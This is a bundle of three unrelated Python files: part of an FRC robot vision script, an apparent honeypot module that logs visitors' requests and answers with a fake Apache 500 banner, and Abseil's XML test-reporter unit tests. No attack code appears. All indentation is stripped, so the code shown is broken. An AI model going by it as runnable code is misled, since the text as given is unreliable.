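# Worked example (hypothetical numbers): a target centred at pixel x = 192 in
# the 256-wide frame (centerX = 127.5) with the ~216 px focal length gives
# atan(64.5 / 216), i.e. a yaw of roughly 17 degrees to the right.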
# Link to further explanation: https://docs.google.com/presentation/d/1ediRsI-oR3-kwawFJZ34_ZTlQS2SDBLjZasjzZ-eXbQ/pub?start=false&loop=false&slide=id.g12c083cffa_0_298
def calculatePitch(pixelY, centerY, vFocalLength):
pitch = math.degrees(math.atan((pixelY - centerY) / vFocalLength))
# Just stopped working have to do this:
pitch *= -1
return round(pitch)
def getEllipseRotation(image, cnt):
try:
# Gets rotated bounding ellipse of contour
ellipse = cv2.fitEllipse(cnt)
centerE = ellipse[0]
# Gets rotation of ellipse; same as rotation of contour
rotation = ellipse[2]
# Gets width and height of rotated ellipse
widthE = ellipse[1][0]
heightE = ellipse[1][1]
# Maps rotation to (-90 to 90). Makes it easier to tell direction of slant
rotation = translateRotation(rotation, widthE, heightE)
cv2.ellipse(image, ellipse, (23, 184, 80), 3)
return rotation
except:
# Gets rotated bounding rectangle of contour
rect = cv2.minAreaRect(cnt)
# Creates box around that rectangle
box = cv2.boxPoints(rect)
# Not exactly sure
box = np.int0(box)
# Gets center of rotated rectangle
center = rect[0]
# Gets rotation of rectangle; same as rotation of contour
rotation = rect[2]
# Gets width and height of rotated rectangle
width = rect[1][0]
height = rect[1][1]
# Maps rotation to (-90 to 90). Makes it easier to tell direction of slant
rotation = translateRotation(rotation, width, height)
return rotation
#################### FRC VISION PI Image Specific #############
configFile = "/boot/frc.json"
class CameraConfig: pass
team = None
server = False
cameraConfigs = []
"""Report parse error."""
def parseError(str):
print("config error in '" + configFile + "': " + str, file=sys.stderr)
"""Read single camera configuration."""
def readCameraConfig(config):
cam = CameraConfig()
# name
try:
cam.name = config["name"]
except KeyError:
parseError("could not read camera name")
return False
# path
try:
cam.path = config["path"]
except KeyError:
parseError("camera '{}': could not read path".format(cam.name))
return False
cam.config = config
cameraConfigs.append(cam)
return True
"""Read configuration file."""
def readConfig():
global team
global server
# parse file
try:
try:
with open(configFile, "rt") as f:
j = json.load(f)
except:
with open("./frc.json", "rt") as f:
j = json.load(f)
except OSError as err:
print("could not open '{}': {}".format(configFile, err), file=sys.stderr)
return False
# top level must be an object
if not isinstance(j, dict):
parseError("must be JSON object")
return False
# team number
try:
team = j["team"]
except KeyError:
parseError("could not read team number")
return False
# ntmode (optional)
if "ntmode" in j:
str = j["ntmode"]
if str.lower() == "client":
server = False
elif str.lower() == "server":
server = True
else:
parseError("could not understand ntmode value '{}'".format(str))
# cameras
try:
cameras = j["cameras"]
except KeyError:
parseError("could not read cameras")
return False
for camera in cameras:
if not readCameraConfig(camera):
return False
return True
"""Start running the camera."""
def startCamera(config):
print("Starting camera '{}' on {}".format(config.name, config.path))
cs = CameraServer.getInstance()
camera = cs.startAutomaticCapture(name=config.name, path=config.path)
camera.setConfigJson(json.dumps(config.config))
return cs, camera
if __name__ == "__main__":
if len(sys.argv) >= 2:
configFile = sys.argv[1]
# read configuration
if not readConfig():
sys.exit(1)
# start NetworkTables
ntinst = NetworkTablesInstance.getDefault()
#Name of network table - this is how it communicates with robot. IMPORTANT
networkTable = NetworkTables.getTable('ChickenVision')
if server:
print("Setting up NetworkTables server")
ntinst.startServer()
else:
print("Setting up NetworkTables client for team {}".format(team))
ntinst.startClientTeam(team)
# start cameras
cameras = []
streams = []
for cameraConfig in cameraConfigs:
cs, cameraCapture = startCamera(cameraConfig)
streams.append(cs)
cameras.append(cameraCapture)
#Get the first camera
webcam = cameras[0]
cameraServer = streams[0]
#Start thread reading camera
cap = WebcamVideoStream(webcam, cameraServer, image_width, image_height).start()
# (optional) Setup a CvSource. This will send images back to the Dashboard
# Allocating new images is very expensive, always try to preallocate
img = np.zeros(shape=(image_height, image_width, 3), dtype=np.uint8)
#Start thread outputting stream
streamViewer = VideoShow(image_width,image_height, cameraServer, frame=img, name="ChickenVision").start()
#cap.autoExpose=True;
tape = False
fps = FPS().start()
#TOTAL_FRAMES = 200;
# loop forever
while True:
# Tell the CvSink to grab a frame from the camera and put it
# in the source image. If there is an error notify the output.
timestamp, img = cap.read()
#Uncomment if camera is mounted upside down
frame = flipImage(img)
#Comment out if camera is mounted upside down
#frame = img
if timestamp == 0:
# Send the output the error.
streamViewer.notifyError(cap.getError());
# skip the rest of the current iteration
continue
#Checks if you just want camera for driver (No processing), False by default
if(networkTable.getBoolean("Driver", False)):
cap.autoExpose = True
processed = frame
else:
# Checks if you just want camera for Tape processing , False by default
if(networkTable.getBoolean("Tape", True)):
#Lowers exposure to 0
cap.autoExpose = False
boxBlur = blurImg(frame, green_blur)
threshold = threshold_video(lower_green, upper_green, boxBlur)
processed = findTargets(frame, threshold)
else:
# Checks if you just want camera for Cargo processing, which, by dint of everything else being false, is true by default
cap.autoExpose = True
boxBlur = blurImg(frame, orange_blur)
threshold = threshold_video(lower_orange, upper_orange, boxBlur)
processed = findCargo(frame, threshold)
#Puts timestamp of camera on network tables
networkTable.putNumber("VideoTimestamp", timestamp)
streamViewer.frame = processed
# update the FPS counter
fps.update()
#Flushes camera values to reduce latency
ntinst.flush()
#Doesn't do anything at the moment. You can easily get this working by indenting these three lines
# and setting while loop to: while fps._numFrames < TOTAL_FRAMES
fps.stop()
print("[INFO] elasped time: {:.2f}".format(fps.elapsed()))
print("[INFO] approx. FPS: {:.2f}".format(fps.fps()))
|
http500.py
|
import socketserver
import threading
from datetime import datetime
from hpotter.env import http500_server, write_db
from hpotter import tables
# remember to put name in __init__.py
Header = '''
HTTP/1.0 500 Internal Server Error
Date: {now}
Server: Apache/2.4.6 (Red Hat Enterprise Linux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: {now}
Cache-Control: max-age=0
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>500 Internal Server Error</title>
</head>
<body>
500 Internal Server Error
</body>
</html>
'''.format(now=datetime.now())
class HTTPHandler(socketserver.BaseRequestHandler):
def handle(self):
connection = tables.Connections(
sourceIP=self.client_address[0],
sourcePort=self.client_address[1],
destIP=self.server.server_address[0],
destPort=self.server.server_address[1],
proto=tables.TCP)
write_db(connection)
self.request.settimeout(30)
try:
data = self.request.recv(4096).decode("utf-8")
except:
return
http = tables.HTTPCommands(request=data, connection=connection)
write_db(http)
self.request.sendall(Header.encode('utf-8'))
class HTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer): pass
def start_server():
http_handler = HTTPHandler
http500_server = HTTPServer(('0.0.0.0', 80), HTTPHandler)
threading.Thread(target=http500_server.serve_forever).start()
def stop_server():
if http500_server:
http500_server.shutdown()
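# Quick manual check (a sketch, assuming start_server() has been called and the
# listener is reachable on 127.0.0.1:80): any request should get the canned
# 500 page back.
def _probe(host='127.0.0.1', port=80):
    import socket
    sock = socket.create_connection((host, port), timeout=5)
    try:
        sock.sendall(b'GET / HTTP/1.0\r\n\r\n')
        return sock.recv(4096).decode('utf-8', 'replace')
    finally:
        sock.close()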
|
xml_reporter_test.py
|
# Copyright 2017 The Abseil Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import os
import re
import subprocess
import sys
import tempfile
import threading
import time
import unittest
from xml.etree import ElementTree
from xml.parsers import expat
from absl import logging
from absl.testing import _bazelize_command
from absl.testing import absltest
from absl.testing import parameterized
from absl.testing import xml_reporter
from absl.third_party import unittest3_backport
import mock
import six
class StringIOWriteLn(six.StringIO):
def writeln(self, line):
self.write(line + '\n')
class MockTest(absltest.TestCase):
failureException = AssertionError
def __init__(self, name):
super(MockTest, self).__init__()
self.name = name
def id(self):
return self.name
def runTest(self):
return
def shortDescription(self):
return "This is this test's description."
# str(exception_type) is different between Python 2 and 3.
def xml_escaped_exception_type(exception_type):
return xml_reporter._escape_xml_attr(str(exception_type))
OUTPUT_STRING = '\n'.join([
r'<\?xml version="1.0"\?>',
'<testsuites name="" tests="%(tests)d" failures="%(failures)d"'
' errors="%(errors)d" time="%(run_time).1f" timestamp="%(start_time)s">',
'<testsuite name="%(suite_name)s" tests="%(tests)d"'
' failures="%(failures)d" errors="%(errors)d" time="%(run_time).1f" timestamp="%(start_time)s">',
' <testcase name="%(test_name)s" status="%(status)s" result="%(result)s"'
' time="%(run_time).1f" classname="%(classname)s"'
' timestamp="%(start_time)s">%(message)s', ' </testcase>', '</testsuite>',
'</testsuites>'
])
FAILURE_MESSAGE = r"""
<failure message="e" type="{}"><!\[CDATA\[Traceback \(most recent call last\):
File ".*xml_reporter_test\.py", line \d+, in get_sample_failure
raise AssertionError\(\'e\'\)
AssertionError: e
\]\]></failure>""".format(xml_escaped_exception_type(AssertionError))
ERROR_MESSAGE = r"""
<error message="invalid literal for int\(\) with base 10: (')?a(')?" type="{}"><!\[CDATA\[Traceback \(most recent call last\):
File ".*xml_reporter_test\.py", line \d+, in get_sample_error
int\('a'\)
ValueError: invalid literal for int\(\) with base 10: '?a'?
\]\]></error>""".format(xml_escaped_exception_type(ValueError))
UNICODE_MESSAGE = r"""
<%s message="{0}" type="{1}"><!\[CDATA\[Traceback \(most recent call last\):
File ".*xml_reporter_test\.py", line \d+, in get_unicode_sample_failure
raise AssertionError\(u'\\xe9'\)
AssertionError: {0}
\]\]></%s>""".format(
r'\\xe9' if six.PY2 else r'\xe9',
xml_escaped_exception_type(AssertionError))
NEWLINE_MESSAGE = r"""
<%s message="{0}" type="{1}"><!\[CDATA\[Traceback \(most recent call last\):
File ".*xml_reporter_test\.py", line \d+, in get_newline_message_sample_failure
raise AssertionError\(\'{2}'\)
AssertionError: {3}
\]\]></%s>""".format(
'new&#xA;line',
xml_escaped_exception_type(AssertionError),
r'new\\nline',
'new\nline')
UNEXPECTED_SUCCESS_MESSAGE = '\n'.join([
'',
r' <error message="" type=""><!\[CDATA\[Test case '
r'__main__.MockTest.unexpectedly_passing_test should have failed, '
r'but passed.\]\]></error>'])
UNICODE_ERROR_MESSAGE = UNICODE_MESSAGE % ('error', 'error')
NEWLINE_ERROR_MESSAGE = NEWLINE_MESSAGE % ('error', 'error')
class TextAndXMLTestResultTest(absltest.TestCase):
def setUp(self):
self.stream = StringIOWriteLn()
self.xml_stream = six.StringIO()
def _make_result(self, times):
timer = mock.Mock()
timer.side_effect = times
return xml_reporter._TextAndXMLTestResult(self.xml_stream, self.stream,
'foo', 0, timer)
def _assert_match(self, regex, output):
self.assertRegex(output, regex)
def _assert_valid_xml(self, xml_output):
try:
expat.ParserCreate().Parse(xml_output)
except expat.ExpatError as e:
raise AssertionError('Bad XML output: {}\n{}'.format(e, xml_output))
def _simulate_error_test(self, test, result):
result.startTest(test)
result.addError(test, self.get_sample_error())
result.stopTest(test)
def _simulate_failing_test(self, test, result):
result.startTest(test)
result.addFailure(test, self.get_sample_failure())
result.stopTest(test)
def _simulate_passing_test(self, test, result):
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
def test_with_passing_test(self):
start_time = 0
end_time = 2
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.passing_test')
result.startTestRun()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
0,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
'passing_test',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
''
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_passing_subtest(self):
start_time = 0
end_time = 2
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.passing_test')
if six.PY3:
subtest = unittest.case._SubTest(test, 'msg', None)
else:
subtest = unittest3_backport.case._SubTest(test, 'msg', None)
result.startTestRun()
result.startTest(test)
result.addSubTest(test, subtest, None)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
0,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
r'passing_test \[msg\]',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
''
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_passing_subtest_with_dots_in_parameter_name(self):
start_time = 0
end_time = 2
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.passing_test')
if six.PY3:
subtest = unittest.case._SubTest(test, 'msg', {'case': 'a.b.c'})
else:
# In Python 3 subTest uses a ChainMap to hold the parameters, but ChainMap
# does not exist in Python 2, so a list of dict is used to simulate the
# behavior of a ChainMap. This is why a list is provided as a parameter
# here.
subtest = unittest3_backport.case._SubTest(test, 'msg',
[{'case': 'a.b.c'}])
result.startTestRun()
result.startTest(test)
result.addSubTest(test, subtest, None)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
0,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
r'passing_test \[msg\] \(case=\'a.b.c\'\)',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
''
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def get_sample_error(self):
try:
int('a')
except ValueError:
error_values = sys.exc_info()
return error_values
def get_sample_failure(self):
try:
raise AssertionError('e')
except AssertionError:
error_values = sys.exc_info()
return error_values
def get_newline_message_sample_failure(self):
try:
raise AssertionError('new\nline')
except AssertionError:
error_values = sys.exc_info()
return error_values
def get_unicode_sample_failure(self):
try:
raise AssertionError(u'\xe9')
except AssertionError:
error_values = sys.exc_info()
return error_values
def get_terminal_escape_sample_failure(self):
try:
raise AssertionError('\x1b')
except AssertionError:
error_values = sys.exc_info()
return error_values
def test_with_failing_test(self):
start_time = 10
end_time = 20
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addFailure(test, self.get_sample_failure())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
1,
'errors':
0,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
'failing_test',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
FAILURE_MESSAGE
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_failing_subtest(self):
start_time = 10
end_time = 20
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
if six.PY3:
subtest = unittest.case._SubTest(test, 'msg', None)
else:
subtest = unittest3_backport.case._SubTest(test, 'msg', None)
result.startTestRun()
result.startTest(test)
result.addSubTest(test, subtest, self.get_sample_failure())
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
1,
'errors':
0,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
r'failing_test \[msg\]',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
FAILURE_MESSAGE
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_error_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addError(test, self.get_sample_error())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
1,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
'failing_test',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
ERROR_MESSAGE
}
self._assert_match(expected_re, xml)
def test_with_error_subtest(self):
start_time = 10
end_time = 20
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.error_test')
if six.PY3:
subtest = unittest.case._SubTest(test, 'msg', None)
else:
subtest = unittest3_backport.case._SubTest(test, 'msg', None)
result.startTestRun()
result.startTest(test)
result.addSubTest(test, subtest, self.get_sample_error())
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
1,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
r'error_test \[msg\]',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
ERROR_MESSAGE
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_fail_and_error_test(self):
"""Tests a failure and subsequent error within a single result."""
start_time = 123
end_time = 456
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addFailure(test, self.get_sample_failure())
# This could happen in tearDown
result.addError(test, self.get_sample_error())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
1, # Only the failure is tallied (because it was first).
'errors':
0,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
'failing_test',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
# Messages from failure and error should be concatenated in order.
'message':
FAILURE_MESSAGE + ERROR_MESSAGE
}
self._assert_match(expected_re, xml)
def test_with_error_and_fail_test(self):
"""Tests an error and subsequent failure within a single result."""
start_time = 123
end_time = 456
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addError(test, self.get_sample_error())
result.addFailure(test, self.get_sample_failure())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
1, # Only the error is tallied (because it was first).
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
'failing_test',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
# Messages from error and failure should be concatenated in order.
'message':
ERROR_MESSAGE + FAILURE_MESSAGE
}
self._assert_match(expected_re, xml)
def test_with_newline_error_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addError(test, self.get_newline_message_sample_failure())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
1,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
'failing_test',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
NEWLINE_ERROR_MESSAGE
} + '\n'
self._assert_match(expected_re, xml)
def test_with_unicode_error_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addError(test, self.get_unicode_sample_failure())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
1,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
'failing_test',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
UNICODE_ERROR_MESSAGE
}
self._assert_match(expected_re, xml)
def test_with_terminal_escape_error(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addError(test, self.get_terminal_escape_sample_failure())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
self._assert_valid_xml(self.xml_stream.getvalue())
def test_with_expected_failure_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, start_time, end_time, end_time))
error_values = ''
try:
raise RuntimeError('Test expectedFailure')
except RuntimeError:
error_values = sys.exc_info()
test = MockTest('__main__.MockTest.expected_failing_test')
result.startTestRun()
result.startTest(test)
result.addExpectedFailure(test, error_values)
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
0,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
'expected_failing_test',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
''
}
self._assert_match(re.compile(expected_re, re.DOTALL),
self.xml_stream.getvalue())
def test_with_unexpected_success_error_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.unexpectedly_passing_test')
result.startTestRun()
result.startTest(test)
result.addUnexpectedSuccess(test)
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
1,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
'unexpectedly_passing_test',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
UNEXPECTED_SUCCESS_MESSAGE
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_skipped_test(self):
start_time = 100
end_time = 100
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.skipped_test_with_reason')
result.startTestRun()
result.startTest(test)
result.addSkip(test, 'b"r')
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
0,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
'skipped_test_with_reason',
'classname':
'__main__.MockTest',
'status':
'notrun',
'result':
'suppressed',
'message':
''
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_suite_time(self):
start_time1 = 100
end_time1 = 200
start_time2 = 400
end_time2 = 700
name = '__main__.MockTest.failing_test'
result = self._make_result((start_time1, start_time1, end_time1,
start_time2, end_time2, end_time2))
test = MockTest('%s1' % name)
result.startTestRun()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
test = MockTest('%s2' % name)
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = max(end_time1, end_time2) - min(start_time1, start_time2)
timestamp = datetime.datetime.utcfromtimestamp(start_time1).isoformat()
expected_prefix = """<?xml version="1.0"?>
<testsuites name="" tests="2" failures="0" errors="0" time="%.1f" timestamp="%s">
<testsuite name="MockTest" tests="2" failures="0" errors="0" time="%.1f" timestamp="%s">
""" % (run_time, timestamp, run_time, timestamp)
xml_output = self.xml_stream.getvalue()
self.assertTrue(
xml_output.startswith(expected_prefix),
'%s not found in %s' % (expected_prefix, xml_output))
def test_with_no_suite_name(self):
start_time = 1000
end_time = 1200
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.bad_name')
result.startTestRun()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
0,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
'bad_name',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
''
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_unnamed_parameterized_testcase(self):
"""Test unnamed parameterized test cases.
Unnamed parameterized test cases might have non-alphanumeric characters in
their test method names. This test ensures xml_reporter handles them
correctly.
"""
class ParameterizedTest(parameterized.TestCase):
@parameterized.parameters(('a (b.c)',))
def test_prefix(self, case):
self.assertTrue(case.startswith('a'))
start_time = 1000
end_time = 1200
result = self._make_result((start_time, start_time, end_time, end_time))
test = ParameterizedTest(methodName='test_prefix0')
result.startTestRun()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
classname = xml_reporter._escape_xml_attr(
unittest.util.strclass(test.__class__))
expected_re = OUTPUT_STRING % {
'suite_name':
'ParameterizedTest',
'tests':
1,
'failures':
0,
'errors':
0,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
            re.escape('test_prefix(\'a (b.c)\')'),
'classname':
classname,
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
''
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def teststop_test_without_pending_test(self):
end_time = 1200
result = self._make_result((end_time,))
test = MockTest('__main__.MockTest.bad_name')
result.stopTest(test)
result.stopTestRun()
# Just verify that this doesn't crash
def test_text_and_xmltest_runner(self):
runner = xml_reporter.TextAndXMLTestRunner(self.xml_stream, self.stream,
'foo', 1)
result1 = runner._makeResult()
result2 = xml_reporter._TextAndXMLTestResult(None, None, None, 0, None)
self.failUnless(type(result1) is type(result2))
def test_timing_with_time_stub(self):
"""Make sure that timing is correct even if time.time is stubbed out."""
try:
saved_time = time.time
time.time = lambda: -1
reporter = xml_reporter._TextAndXMLTestResult(self.xml_stream,
self.stream,
'foo', 0)
test = MockTest('bar')
reporter.startTest(test)
self.failIf(reporter.start_time == -1)
finally:
time.time = saved_time
def test_concurrent_add_and_delete_pending_test_case_result(self):
"""Make sure adding/deleting pending test case results are thread safe."""
result = xml_reporter._TextAndXMLTestResult(None, self.stream, None, 0,
None)
def add_and_delete_pending_test_case_result(test_name):
test = MockTest(test_name)
result.addSuccess(test)
result.delete_pending_test_case_result(test)
for i in range(50):
add_and_delete_pending_test_case_result('add_and_delete_test%s' % i)
self.assertEqual(result.pending_test_case_results, {})
def test_concurrent_test_runs(self):
"""Make sure concurrent test runs do not race each other."""
num_passing_tests = 20
num_failing_tests = 20
num_error_tests = 20
total_num_tests = num_passing_tests + num_failing_tests + num_error_tests
    times = [0] + list(range(2 * total_num_tests)) + [2 * total_num_tests - 1]
result = self._make_result(times)
threads = []
names = []
result.startTestRun()
for i in range(num_passing_tests):
name = 'passing_concurrent_test_%s' % i
names.append(name)
test_name = '__main__.MockTest.%s' % name
# xml_reporter uses id(test) as the test identifier.
# In a real testing scenario, all the test instances are created before
# running them. So all ids will be unique.
# We must do the same here: create test instance beforehand.
test = MockTest(test_name)
threads.append(threading.Thread(
target=self._simulate_passing_test, args=(test, result)))
for i in range(num_failing_tests):
name = 'failing_concurrent_test_%s' % i
names.append(name)
test_name = '__main__.MockTest.%s' % name
test = MockTest(test_name)
threads.append(threading.Thread(
target=self._simulate_failing_test, args=(test, result)))
for i in range(num_error_tests):
name = 'error_concurrent_test_%s' % i
names.append(name)
test_name = '__main__.MockTest.%s' % name
test = MockTest(test_name)
threads.append(threading.Thread(
target=self._simulate_error_test, args=(test, result)))
for t in threads:
t.start()
for t in threads:
t.join()
result.stopTestRun()
result.printErrors()
tests_not_in_xml = []
for tn in names:
if tn not in self.xml_stream.getvalue():
tests_not_in_xml.append(tn)
msg = ('Expected xml_stream to contain all test %s results, but %s tests '
'are missing. List of missing tests: %s' % (
total_num_tests, len(tests_not_in_xml), tests_not_in_xml))
self.assertEqual([], tests_not_in_xml, msg)
def test_add_failure_during_stop_test(self):
"""Tests an addFailure() call from within a stopTest() call stack."""
result = self._make_result((0, 2))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
# Replace parent stopTest method from unittest3_backport.TextTestResult with
# a version that calls self.addFailure().
with mock.patch.object(
unittest3_backport.TextTestResult,
'stopTest',
side_effect=lambda t: result.addFailure(t, self.get_sample_failure())):
# Run stopTest in a separate thread since we are looking to verify that
# it does not deadlock, and would otherwise prevent the test from
# completing.
stop_test_thread = threading.Thread(target=result.stopTest, args=(test,))
stop_test_thread.daemon = True
stop_test_thread.start()
stop_test_thread.join(10.0)
self.assertFalse(stop_test_thread.is_alive(),
'result.stopTest(test) call failed to complete')
class XMLTest(absltest.TestCase):
def test_escape_xml(self):
